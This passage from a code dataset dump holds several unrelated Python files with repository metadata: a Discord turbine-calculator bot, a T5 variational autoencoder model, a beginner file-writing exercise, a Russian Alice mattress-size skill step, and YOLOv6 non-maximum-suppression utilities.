\"Steel: `s`, `ste`, `:steel:`\\n\"\n \"Extreme: `ext`, `ex`, `:extreme:`\\n\"\n \"SiC-SiC CMC: `sic`, `sicsic`, `:sicsic:`\", inline=False)\n helpPage3.set_footer(text=footer)\n helpPage4 = discord.Embed(title=\"Help menu (Page 4)\", colour=0x123456)\n helpPage4.add_field(name=\"&stats Details\", value=\"`turbine string`: A string that describes the turbine's dimensions, \"\n \"blades, fuel, etc. Obtained by running &calc on your desired turbine.\\n\"\n \"`input rate`: The gas input rate in mB/t.\\n\"\n \"`dynamo efficiency`: The dynamo (coil) efficiency of the turbine.\\n\"\n \"Can be a number or a percentage (eg. 
1.039 or 103.9%) \"\n \"**__Optional Parameter__**\", inline=False)\n helpPage4.add_field(name=\"Example of a &stats command\", value=\"`&stats /overhaul/hps/16.0/4.0/10/4/aaaa/ 1450 101%`\\n\"\n \"This will calculate the stats of a turbine in overhaul,\\n\"\n \"that runs high pressure steam, is 10x10x4, has a 4x4 bearing,\\n\"\n \"blades are all steel, input rate is 1450 mB/t,\\n\"\n \"and dynamo efficiency is 101%.\", inline=False)\n helpPage4.set_footer(text=footer)\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [helpPage1, helpPage2, helpPage3, helpPage4])\n\n\n@client.command(aliases=[\"turbine\", \"plan\"])\nasync def calc(ctx, *args): # args: (overhaul/underhaul) (RF density) (ideal expansion) (blades)\n blades = []\n gasName, inputError, args = None, False, list(args)\n error, turbineDim, bearingDim, dimsInput = \"\", 3, 1, False\n sanitizeInput = (\"*\", \"_\", \"`\", \"~\", \",\")\n\n for i in range(len(args)):\n for md in sanitizeInput:\n args[i] = args[i].replace(md, \"\")\n\n # checks if there's enough arguments\n try:\n # checks calculation mode (1st argument)\n if (args[0].lower()).replace(\" \", \"\") not in overhaulAliases + preoverhaulAliases:\n inputError = True\n error += \"\\\"{}\\\" is not a valid calculation mode!\\n\".format(args[0])\n else:\n args[0] = (args[0].lower()).replace(\" \", \"\")\n if args[0] in overhaulAliases:\n args[0] = overhaulAliases[0]\n elif args[0] in preoverhaulAliases:\n args[0] = preoverhaulAliases[0]\n\n # checks if the 2nd argument is a steam type or RF density, checks for invalid steam & invalid RF/mb\n try:\n typeDetection = float(args[1])\n if typeDetection <= 0.0:\n inputError = True\n error += \"Turbine fuel must have a positive energy density!\\n\"\n\n try:\n if args[2].endswith(\"%\"):\n args[2] = args[2].replace(\"%\", \"\")\n args[2] = float(args[2])/100.0\n else:\n args[2] = float(args[2])\n if args[2] <= 0.0:\n inputError = True\n error += \"Turbine fuel must have a positive expansion coefficient!\\n\"\n except ValueError:\n inputError = True\n error += \"Missing expansion coefficient parameter!\\n\"\n\n gasName = \"Custom\"\n\n # checks if turbine dimensions have been entered\n if re.search(\"t[0-9]\", args[3]):\n try:\n bearingDetect = (args[3].lower()).index(\"b\")\n turbineDim = int(args[3][1:bearingDetect])\n if not (3 <= turbineDim <= 24):\n inputError = True\n error += \"Turbine diameter must be between 3 and 24 blocks!\\n\"\n try:\n bearingDim = int(args[3][bearingDetect + 1:])\n if not (1 <= bearingDim <= turbineDim - 2 and turbineDim % 2 == bearingDim % 2):\n inputError = True\n error += \"Bearing diameter must be between 1 and Turbine diameter - 2! 
If turbine \" \\\n                                     \"diameter is even, bearing must be even; The same applies for odd turbine diameter.\\n\"\n                    else:\n                        dimsInput = True\n                        blades = args[4:]\n                except ValueError:\n                    inputError = True\n                    error += \"Invalid bearing dimension!\\n\"\n            except IndexError:\n                inputError = True\n                error += \"Turbine dimensions \\\"{}\\\" are invalid!\\n\".format(args[3])\n\n        else:\n            dimsInput = False\n            blades = args[3:]\n\n    except ValueError:\n\n        try:\n            typeDetection = float(args[2])\n            inputError = True\n            error += \"You can't have both a fuel type and an ideal expansion!\\n\"\n        except ValueError:\n            pass\n\n        steamFound = False\n        gasName = args[1]\n\n        for aliases in gasAliases.values():\n            if (gasName.lower()).replace(\" \", \"\") in aliases:\n                gasName = aliases[0]\n                steamFound = True\n                break\n\n        if steamFound and (args[0] in preoverhaulAliases\n                           and gasName not in (\"hps\", \"lps\", \"steam\")):\n            inputError = True\n            error += \"Turbine fuel \\\"{}\\\" can't be used in {}!\\n\".format(gasName, args[0])\n\n        if not steamFound:\n            inputError = True\n            error += \"Turbine fuel \\\"{}\\\" is invalid!\\n\".format(gasName)\n\n        # checks for dimensions\n        if re.search(\"t[0-9]\", args[2]):\n            try:\n                bearingDetect = (args[2].lower()).index(\"b\")\n                turbineDim = int(args[2][1:bearingDetect])\n                if not (3 <= turbineDim <= 24):\n                    inputError = True\n                    error += \"Turbine diameter must be between 3 and 24 blocks!\\n\"\n                try:\n                    bearingDim = int(args[2][bearingDetect + 1:])\n                    if not (1 <= bearingDim <= turbineDim - 2 and turbineDim % 2 == bearingDim % 2):\n                        inputError = True\n                        error += \"Bearing diameter must be between 1 and Turbine diameter - 2! If turbine \" \\\n                                 \"diameter is even, bearing must be even; The same applies for odd turbine diameter.\\n\"\n                    else:\n                        dimsInput = True\n                        blades = args[3:]\n                except ValueError:\n                    inputError = True\n                    error += \"Invalid bearing dimension!\\n\"\n            except IndexError:\n                inputError = True\n                error += \"Turbine dimensions \\\"{}\\\" are invalid!\\n\".format(args[2])\n\n        else:\n            dimsInput = False\n            blades = args[2:]\n\n        # checks for invalid blades\n        for i1 in range(len(blades)):\n            bladeFound = False\n\n            for aliases in bladeAliases.values():\n                if blades[i1].startswith(\"<\"):\n                    colon2 = blades[i1].find(\":\", 2)\n                    blades[i1] = blades[i1][2:colon2]\n                else:\n                    blades[i1] = (blades[i1].lower()).replace(\" \", \"\")\n\n                if blades[i1] in aliases:\n                    bladeFound = True\n                    blades[i1] = aliases[0]\n\n            if bladeFound and (args[0] in preoverhaulAliases\n                               and blades[i1] not in (\"stator\", \"steel\", \"extreme\", \"sic\")):\n                inputError = True\n                error += \"Blade #{} ({}) does not exist in {}!\\n\".format(i1 + 1, blades[i1], args[0])\n\n            if not bladeFound:\n                inputError = True\n                error += \"Blade #{} ({}) is invalid!\\n\".format(i1 + 1, blades[i1])\n    except IndexError:\n        inputError = True\n        error += \"At least one argument is missing!\\n\"\n\n    if len(blades) > 24:\n        inputError = True\n        error += \"This turbine is too long!\\n\"\n    elif len(blades) < 1:\n        inputError = True\n        error += \"This turbine is too short!\\n\"\n\n    if not inputError:\n        mode = args[0]\n        if gasName not in list(gasStats):\n            gasRFMB = float(args[1])\n            gasExp = float(args[2])\n        else:\n            gasRFMB = gasStats[gasName][0]\n            gasExp = gasStats[gasName][1]\n\n        if dimsInput:\n            embedsList = calcStats(mode, gasName, gasRFMB, gasExp, blades, (turbineDim, bearingDim), None, None)\n        else:\n            embedsList = calcStats(mode, gasName, gasRFMB, gasExp, blades, None, None, None)\n\n        if ctx.channel.id == enabled_channel:\n            await embedSetup(ctx, embedsList)\n\n    else:\n        results = discord.Embed(title=\"Error in command!\", 
colour=0xd50505, description=\"Oh no! The bot could not\"\n \" calculate the turbine!\")\n if len(error) > 1000:\n error = \"{}... (too long)\".format(error[:1000])\n results.add_field(name=\"Errors detected:\", value=\"{}\".format(error), inline=False)\n results.set_footer(text=\"Turbine Calculator Bot by FishingPole#3673\")\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [results])\n\n\n@client.command()\nasync def stats(ctx, *args): # &stats (turbine string) (mB/t input) (coil efficiency)\n args, inputError = list(args), False\n turbineInfo, bladeList, embedsList, errorString = [], [], [], \"\"\n\n try:\n args[1] = float(args[1])\n if args[1] < 0:\n inputError = True\n errorString += \"Gas input must be a positive number!\\n\"\n except ValueError:\n inputError = True\n errorString += \"Gas input must be a positive number!\\n\"\n except IndexError:\n inputError = True\n errorString += \"Gas input is missing!\\n\"\n\n try:\n if args[2].endswith(\"%\"):\n args[2] = args[2].replace(\"%\", \"\")\n args[2] = float(args[2])/100.0\n else:\n args[2] = float(args[2])\n except IndexError:\n args.append(None)\n except ValueError:\n inputError = True\n errorString += \"Dynamo efficiency must be a positive number!\\n\"\n\n if not inputError:\n if args[0].count(\"/\") == 8:\n slash2 = 0\n for i in range(7):\n slash1 = slash2\n slash2 = args[0].find(\"/\", slash1 + 1)\n turbineInfo.append(args[0][slash1 + 1:slash2])\n\n for char in turbineInfo[-1]:\n if char in bladeConversions.values():\n charPos = list(bladeConversions.values()).index(char)\n bladeList.append(list(bladeConversions)[charPos])\n\n embedsList = calcStats(turbineInfo[0], turbineInfo[1], float(turbineInfo[2]), float(turbineInfo[3]), bladeList,\n (int(turbineInfo[4]), int(turbineInfo[5])), args[1], args[2])\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, embedsList)\n else:\n errorEmbed = discord.Embed(title=\"Error in command!\", colour=0xd50505, description=\"Oh no! 
The bot could not\"\n \" calculate the turbine!\")\n errorEmbed.add_field(name=\"Errors detected:\", value=\"{}\".format(errorString), inline=False)\n errorEmbed.set_footer(text=\"Turbine Calculator Bot by FishingPole#3673\")\n if ctx.channel.id == enabled_channel:\n await embedSetup(ctx, [errorEmbed])\n\n\nclient.run(token)\n","repo_name":"ThePoleThatFishes/Turbine-Bot","sub_path":"TurbineBot.py","file_name":"TurbineBot.py","file_ext":"py","file_size_in_byte":34706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18804245063","text":"from typing import Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\n\nfrom transformers import T5ForConditionalGeneration\nfrom transformers.utils import logging\n\nfrom .outputs import BaseModelOutput, Seq2SeqLMOutput, VAEOutput, Seq2SeqVAELMOutput\n\nlogger = logging.get_logger(__name__)\n\nclass T5VAEForConditionalGeneration(T5ForConditionalGeneration):\n def __init__(self, config, dims_hidden, dim_latent, p):\n super().__init__(config)\n\n encoder = []\n encoder_input_layer = nn.Linear(config.d_model, dims_hidden[0])\n for dim_in, dim_out in zip(dims_hidden[:-1], dims_hidden[1:]):\n encoder.append(\n nn.Sequential(\n nn.Dropout(p),\n nn.Linear(dim_in, dim_out),\n nn.ReLU()\n )\n )\n self.vae_encoder = nn.Sequential(\n encoder_input_layer,\n *encoder\n )\n\n self.vae_fc_mu = nn.Linear(dims_hidden[-1], dim_latent)\n self.vae_fc_var = nn.Linear(dims_hidden[-1], dim_latent)\n\n dims_hidden_reversed = dims_hidden[::-1]\n decoder = []\n decoder_input_layer = nn.Linear(dim_latent, dims_hidden_reversed[0])\n decoder_output_layer = nn.Sequential(\n nn.Linear(dims_hidden_reversed[-1], config.d_model),\n nn.Tanh()\n )\n for dim_in, dim_out in zip(dims_hidden_reversed[:-1], dims_hidden_reversed[1:]):\n decoder.append(\n nn.Sequential(\n nn.Dropout(p),\n nn.Linear(dim_in, dim_out),\n nn.ReLU()\n )\n )\n self.vae_decoder = nn.Sequential(\n decoder_input_layer,\n *decoder,\n decoder_output_layer\n )\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n decoder_input_ids: Optional[torch.LongTensor] = None,\n decoder_attention_mask: Optional[torch.BoolTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n decoder_head_mask: Optional[torch.FloatTensor] = None,\n cross_attn_head_mask: Optional[torch.Tensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n decoder_inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = True,\n return_dict: Optional[bool] = None,\n teacher_forcing: Optional[float] = None\n ) -> Union[Tuple[torch.FloatTensor], Seq2SeqLMOutput]:\n\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n if head_mask is not None and decoder_head_mask is None:\n if self.config.num_layers == self.config.num_decoder_layers:\n decoder_head_mask = head_mask\n\n encoder_outputs = self.encode(\n input_ids, \n attention_mask, \n head_mask, \n encoder_outputs, \n inputs_embeds, \n output_attentions, \n output_hidden_states, \n return_dict\n )\n\n hidden_states = 
encoder_outputs[0]\n vae_output = self.autoencode(hidden_states, attention_mask)\n\n if teacher_forcing is None:\n hidden_states = vae_output.recon\n else:\n coefficients = torch.rand_like(hidden_states)\n hidden_states = (coefficients <= teacher_forcing).to(torch.bfloat16)*hidden_states + (coefficients > teacher_forcing).to(torch.bfloat16)*vae_output.recon\n\n decoder_outputs = self.decode(\n hidden_states,\n attention_mask, \n decoder_input_ids, \n decoder_attention_mask, \n decoder_head_mask, \n cross_attn_head_mask,\n encoder_outputs, \n past_key_values, \n decoder_inputs_embeds, \n labels, \n use_cache, \n output_attentions,\n output_hidden_states, \n return_dict\n )\n \n decoder_outputs.mu = vae_output.mu\n decoder_outputs.logvar = vae_output.logvar\n decoder_outputs.latent = vae_output.latent\n decoder_outputs.recon=vae_output.recon\n\n return decoder_outputs\n\n def autoencode(\n self,\n hidden_states,\n attention_mask\n ):\n vae_h = self.vae_encoder(hidden_states)\n vae_mu = self.vae_fc_mu(vae_h)\n vae_logvar = self.vae_fc_var(vae_h)\n vae_std = torch.exp(0.5*vae_logvar)\n vae_eps = torch.randn_like(vae_std)\n vae_z = vae_eps * vae_std + vae_mu\n recon = self.vae_decoder(vae_z)\n\n return VAEOutput(vae_mu, vae_logvar, vae_z, recon)\n\n def encode(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ):\n if encoder_outputs is None:\n encoder_outputs = self.encoder(\n input_ids=input_ids,\n attention_mask=attention_mask,\n inputs_embeds=inputs_embeds,\n head_mask=head_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):\n encoder_outputs = BaseModelOutput(\n last_hidden_state=encoder_outputs[0],\n hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,\n attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,\n )\n\n return encoder_outputs\n\n def decode(\n self,\n hidden_states, \n attention_mask: Optional[torch.FloatTensor] = None,\n decoder_input_ids: Optional[torch.LongTensor] = None,\n decoder_attention_mask: Optional[torch.BoolTensor] = None,\n decoder_head_mask: Optional[torch.FloatTensor] = None,\n cross_attn_head_mask: Optional[torch.Tensor] = None,\n encoder_outputs: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,\n decoder_inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ):\n if self.model_parallel:\n torch.cuda.set_device(self.decoder.first_device)\n\n if labels is not None and decoder_input_ids is None and decoder_inputs_embeds is None:\n decoder_input_ids = self._shift_right(labels)\n\n if self.model_parallel:\n torch.cuda.set_device(self.decoder.first_device)\n hidden_states = hidden_states.to(self.decoder.first_device)\n if decoder_input_ids is not None:\n decoder_input_ids = decoder_input_ids.to(self.decoder.first_device)\n if attention_mask is not None:\n attention_mask = 
attention_mask.to(self.decoder.first_device)\n if decoder_attention_mask is not None:\n decoder_attention_mask = decoder_attention_mask.to(self.decoder.first_device)\n\n decoder_outputs = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n inputs_embeds=decoder_inputs_embeds,\n past_key_values=past_key_values,\n encoder_hidden_states=hidden_states,\n encoder_attention_mask=attention_mask,\n head_mask=decoder_head_mask,\n cross_attn_head_mask=cross_attn_head_mask,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n sequence_output = decoder_outputs[0]\n\n if self.model_parallel:\n torch.cuda.set_device(self.encoder.first_device)\n self.lm_head = self.lm_head.to(self.encoder.first_device)\n sequence_output = sequence_output.to(self.lm_head.weight.device)\n\n if self.config.tie_word_embeddings:\n sequence_output = sequence_output * (self.model_dim**-0.5)\n\n lm_logits = self.lm_head(sequence_output)\n\n loss = None\n if labels is not None:\n loss_fct = CrossEntropyLoss(ignore_index=-100)\n labels = labels.to(lm_logits.device)\n loss = loss_fct(lm_logits.view(-1, lm_logits.size(-1)), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + decoder_outputs[1:] + encoder_outputs\n return ((loss,) + output) if loss is not None else output\n\n return Seq2SeqVAELMOutput(\n loss=loss,\n logits=lm_logits,\n past_key_values=decoder_outputs.past_key_values,\n decoder_hidden_states=decoder_outputs.hidden_states,\n decoder_attentions=decoder_outputs.attentions,\n cross_attentions=decoder_outputs.cross_attentions,\n encoder_last_hidden_state=encoder_outputs.last_hidden_state,\n encoder_hidden_states=encoder_outputs.hidden_states,\n encoder_attentions=encoder_outputs.attentions,\n )","repo_name":"AxelGiottonini/VAE-T5","sub_path":"src/modeling_t5vae.py","file_name":"modeling_t5vae.py","file_ext":"py","file_size_in_byte":10059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11286335379","text":"# To write files, use the write method, which writes a string to the file\n\nfile = open(\"new.txt\", \"w\") # The 'w' mode writes a file if it doesn't already exist\nfile.write(\"I want to be a programmer, hacker and a full stack web developer\\n\"\n \"Plus I want to hack the government, not for malicious purposes but to expose of the truth!\")\nfile.close()\n\nfile = open(\"new.txt\", \"r\")\nprint(file.read())\nfile.close()\n\n# When a file is opened in write mode, the file's existing content is deleted\nfile = open(\"new.txt\", \"r\")\nprint(\"\\nReading initial contents\")\nprint(file.read())\nprint(\"\\nFINISHED\")\n\nfile = open(\"new.txt\", \"w\")\nfile.write(\"Programming is magical, its like writing poetry and revealing what is inside your heart\\n\"\n \"Not just for fun but for the world to see your inner abilities\")\nfile.close()\n\nfile = open(\"new.txt\", \"r\")\nprint(\"\\nReading new contents\\n\")\nprint(file.read())\nprint(\"\\nDONE\")\nfile.close()\n\n# The write method returns the number of bytes written to a file, if successful\nmsg = \"Ghettocole is fucken awesome\"\nfile = open(\"msg.txt\", \"w\")\n_bytes = file.write(msg)\nprint(_bytes)\nfile.close()\n","repo_name":"GhettoCole/Python3-","sub_path":"Exceptions & Files/Writing files.py","file_name":"Writing 
files.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23507438381","text":"from .hardness import Hardness\nimport random\n\nclass Size:\n    def __init__ (self) :\n        self.dictionary = [\n            'я помогу подобрать матрас.\\r\\n',\n            'ответьте на несколько вопросов, чтобы я подобрала вам матрас.\\r\\n',\n            'помогу вам выбрать комфортный матрас.\\r\\n',\n            'давайте уточним некоторые детали.\\r\\n'\n        ]\n        self.question = [\n            'Какой ширины матрас вам нужен?'\n        ]\n        self.hello = ['Привет']\n        self.name = 'size'\n        self.nextStep = Hardness()\n\n    def getName (self) :\n        return self.name\n    \n    def getText (self, previousAnswer = '') :\n        if previousAnswer == '':\n            messageIndex = random.randint(0,3)\n            # helloIndex = random.randint(0,1)\n            # questionIndex = random.randint(0,1)\n            return self.hello[0] + \", \" + self.dictionary[messageIndex] + self.question[0]\n        if previousAnswer == 0:\n            self.nextStep = Size()\n            return \"Вы не дали мне ширину матраса. Пожалуйста, скажите какой ширины матрас нужен вам?\"\n\n    def saveAnswer(self, userSession, userMessage):\n        entities = userMessage['nlu']['entities']\n        width = 0\n        isNum = False\n        for k in entities :\n            if k['type'] == \"YANDEX.NUMBER\":\n                if not isNum :\n                    width = k['value']\n                    isNum = True\n        userSession['answers']['size'] = width\n        if width == 0 :\n            self.nextStep = Size()\n        \n\n    def getNextStep (self) :\n        return self.nextStep","repo_name":"Kirich11/ikea-alice","sub_path":"steps/size.py","file_name":"size.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19429126775","text":"import time\nimport sys\nimport os\nimport numpy as np\nimport cv2\nimport torch.nn as nn\nimport torch\nimport torchvision\n\nfrom asone.detectors.yolov6.yolov6.layers.common import Conv\n\ndef nms(boxes, scores, iou_threshold):\n    # Sort by score\n    sorted_indices = np.argsort(scores)[::-1]\n\n    keep_boxes = []\n    while sorted_indices.size > 0:\n        # Pick the box with the highest remaining score\n        box_id = sorted_indices[0]\n        keep_boxes.append(box_id)\n\n        # Compute IoU of the picked box with the rest\n        ious = compute_iou(boxes[box_id, :], boxes[sorted_indices[1:], :])\n\n        # Remove boxes with IoU over the threshold\n        keep_indices = np.where(ious < iou_threshold)[0]\n\n        # print(keep_indices.shape, sorted_indices.shape)\n        sorted_indices = sorted_indices[keep_indices + 1]\n\n    return keep_boxes\n\n\ndef process_output(output, img_height, img_width, \n                    input_width, input_height,\n                    conf_thres, iou_thres):\n    predictions = np.squeeze(output)\n\n    # Filter out object confidence scores below threshold\n    obj_conf = predictions[:, 4]\n    predictions = predictions[obj_conf > conf_thres]\n    obj_conf = obj_conf[obj_conf > conf_thres]\n\n    # Multiply class confidence with bounding box confidence\n    predictions[:, 5:] *= obj_conf[:, np.newaxis]\n\n    # Get the scores\n    scores = np.max(predictions[:, 5:], axis=1)\n\n    # Filter out the objects with a low score (keep predictions and scores aligned)\n    predictions = predictions[scores > conf_thres]\n    scores = scores[scores > conf_thres]\n\n    # Get the class with the highest confidence\n    class_ids = np.argmax(predictions[:, 5:], axis=1)\n\n    # Get bounding boxes for each object\n    boxes = process_and_scale_boxes(predictions, img_height, img_width, \n                input_width, input_height)\n\n    # Apply non-maxima suppression to suppress weak, overlapping bounding boxes\n    indices = nms(boxes, scores, iou_thres)\n\n    return boxes[indices], scores[indices], 
class_ids[indices]\n\ndef compute_iou(box, boxes):\n    # Compute xmin, ymin, xmax, ymax for both boxes\n    xmin = np.maximum(box[0], boxes[:, 0])\n    ymin = np.maximum(box[1], boxes[:, 1])\n    xmax = np.minimum(box[2], boxes[:, 2])\n    ymax = np.minimum(box[3], boxes[:, 3])\n\n    # Compute intersection area\n    intersection_area = np.maximum(0, xmax - xmin) * np.maximum(0, ymax - ymin)\n\n    # Compute union area\n    box_area = (box[2] - box[0]) * (box[3] - box[1])\n    boxes_area = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n    union_area = box_area + boxes_area - intersection_area\n\n    # Compute IoU\n    iou = intersection_area / union_area\n\n    return iou\n\n\ndef xywh2xyxy(x):\n    # Convert bounding box (x, y, w, h) to bounding box (x1, y1, x2, y2)\n    y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n    y[..., 0] = x[..., 0] - x[..., 2] / 2\n    y[..., 1] = x[..., 1] - x[..., 3] / 2\n    y[..., 2] = x[..., 0] + x[..., 2] / 2\n    y[..., 3] = x[..., 1] + x[..., 3] / 2\n    return y\n\ndef prepare_input(image, input_width, input_height):\n    \n    input_img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    # Resize input image\n    input_img = cv2.resize(input_img, (input_width, input_height))\n\n    # Scale input pixel values to 0 to 1\n    input_img = input_img / 255.0\n    input_img = input_img.transpose(2, 0, 1)\n    input_tensor = input_img[np.newaxis, :, :, :].astype(np.float32)\n\n    return input_tensor\n\ndef process_and_scale_boxes(predictions, img_height, img_width, \n                    input_width, input_height):\n    \n    # Extract boxes from predictions (copy so predictions is not modified in place)\n    boxes = predictions[:, :4].copy()\n    # Scale boxes to original image dimensions\n    boxes /= np.array([input_width, input_height, input_width, input_height])\n    boxes *= np.array([img_width, img_height, img_width, img_height])\n    # Convert boxes to xyxy format so they match what nms() and compute_iou() expect\n    boxes = xywh2xyxy(boxes)\n    return boxes\n\ndef load_pytorch(weights, map_location=None, inplace=True, fuse=False):\n    \"\"\"Load model from checkpoint file.\"\"\"\n    ckpt = torch.load(weights, map_location=map_location)  # load\n    model = ckpt['ema' if ckpt.get('ema') else 'model'].float()\n    if fuse:\n        model = fuse_model(model).eval()\n    else:\n        model = model.eval()\n    return model\n\ndef fuse_model(model):\n    for m in model.modules():\n        if type(m) is Conv and hasattr(m, \"bn\"):\n            m.conv = fuse_conv_and_bn(m.conv, m.bn)  # update conv\n            delattr(m, \"bn\")  # remove batchnorm\n            m.forward = m.forward_fuse  # update forward\n    return model\n\ndef fuse_conv_and_bn(conv, bn):\n    # Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/\n    fusedconv = (\n        nn.Conv2d(\n            conv.in_channels,\n            conv.out_channels,\n            kernel_size=conv.kernel_size,\n            stride=conv.stride,\n            padding=conv.padding,\n            groups=conv.groups,\n            bias=True,\n        )\n        .requires_grad_(False)\n        .to(conv.weight.device)\n    )\n\n    # prepare filters\n    w_conv = conv.weight.clone().view(conv.out_channels, -1)\n    w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))\n    fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))\n\n    # prepare spatial bias\n    b_conv = (\n        torch.zeros(conv.weight.size(0), device=conv.weight.device)\n        if conv.bias is None\n        else conv.bias\n    )\n    b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(\n        torch.sqrt(bn.running_var + bn.eps)\n    )\n    fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)\n\n    return fusedconv\n\n\ndef 
non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, max_det=300):\n    \"\"\"Runs Non-Maximum Suppression (NMS) on inference results.\n    This code is borrowed from: https://github.com/ultralytics/yolov5/blob/47233e1698b89fc437a4fb9463c815e9171be955/utils/general.py#L775\n    Args:\n        prediction: (tensor), with shape [N, 5 + num_classes], N is the number of bboxes.\n        conf_thres: (float) confidence threshold.\n        iou_thres: (float) iou threshold.\n        classes: (None or list[int]), if a list is provided, nms only keeps the classes you provide.\n        agnostic: (bool), when it is set to True, we do class-independent nms, otherwise, different classes would do nms respectively.\n        multi_label: (bool), when it is set to True, one box can have multiple labels, otherwise, one box only has one label.\n        max_det:(int), max number of output bboxes.\n\n    Returns:\n         list of detections, each item is one tensor with shape (num_boxes, 6), 6 is for [xyxy, conf, cls].\n    \"\"\"\n\n    num_classes = prediction.shape[2] - 5 # number of classes\n    pred_candidates = prediction[..., 4] > conf_thres # candidates\n\n    # Check the parameters.\n    assert 0 <= conf_thres <= 1, f'conf_thres must be in 0.0 to 1.0, however {conf_thres} is provided.'\n    assert 0 <= iou_thres <= 1, f'iou_thres must be in 0.0 to 1.0, however {iou_thres} is provided.'\n\n    # Function settings.\n    max_wh = 4096 # maximum box width and height\n    max_nms = 30000 # maximum number of boxes put into torchvision.ops.nms()\n    time_limit = 10.0 # quit the function when nms cost time exceeds the limit.\n    multi_label &= num_classes > 1 # multiple labels per box\n\n    tik = time.time()\n    output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]\n    for img_idx, x in enumerate(prediction): # image index, image inference\n        x = x[pred_candidates[img_idx]] # confidence\n\n        # If no box remains, skip the next process.\n        if not x.shape[0]:\n            continue\n\n        # confidence multiply the objectness\n        x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf\n\n        # (center x, center y, width, height) to (x1, y1, x2, y2)\n        box = xywh2xyxy(x[:, :4])\n\n        # Detections matrix's shape is (n,6), each row represents (xyxy, conf, cls)\n        if multi_label:\n            box_idx, class_idx = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T\n            x = torch.cat((box[box_idx], x[box_idx, class_idx + 5, None], class_idx[:, None].float()), 1)\n        else: # Only keep the class with highest scores.\n            conf, class_idx = x[:, 5:].max(1, keepdim=True)\n            x = torch.cat((box, conf, class_idx.float()), 1)[conf.view(-1) > conf_thres]\n\n        # Filter by class, only keep boxes whose category is in classes.\n        if classes is not None:\n            x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]\n\n        # Check shape\n        num_box = x.shape[0] # number of boxes\n        if not num_box: # no boxes kept.\n            continue\n        elif num_box > max_nms: # exceeds max number of boxes.\n            x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence\n\n        # Batched NMS\n        class_offset = x[:, 5:6] * (0 if agnostic else max_wh) # classes\n        boxes, scores = x[:, :4] + class_offset, x[:, 4] # boxes (offset by class), scores\n        keep_box_idx = torchvision.ops.nms(boxes, scores, iou_thres) # NMS\n        if keep_box_idx.shape[0] > max_det: # limit detections\n            keep_box_idx = keep_box_idx[:max_det]\n\n        output[img_idx] = x[keep_box_idx]\n        if (time.time() - tik) > time_limit:\n            print(f'WARNING: NMS cost time exceeded the limit of {time_limit}s.')\n            break # time limit exceeded\n\n    return 
